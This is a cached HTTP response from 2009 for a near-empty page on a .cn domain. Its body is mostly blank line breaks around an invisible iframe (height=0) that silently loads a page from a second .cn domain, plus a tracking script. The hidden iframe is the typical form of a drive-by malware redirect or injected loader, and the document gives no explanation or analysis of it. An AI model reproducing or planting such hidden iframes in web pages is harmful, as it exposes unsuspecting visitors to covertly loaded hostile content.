HTTP/1.1 200 OK
Content-Length: 271
Date: Wed, 25 Feb 2009 10:22:41 GMT
Last-Modified: Wed, 25 Feb 2009 10:22:09 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://www.good2698.cn/yhyw/2.htm
X-Polipo-Date: Wed, 25 Feb 2009 10:33:28 GMT
X-Polipo-Access: Wed, 25 Feb 2009 10:33:28 GMT

 <br>
<br>
<br><br>
<iframe src=http://www.sll2468.cn/a10/fxx.htm width=100 height=0></Iframe>
<br><br><br>
<br><br>
<br>
<br>
<br>
<br><br>
<br>
<br>
<br>


<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/857114/ystet.js"></script>
<br>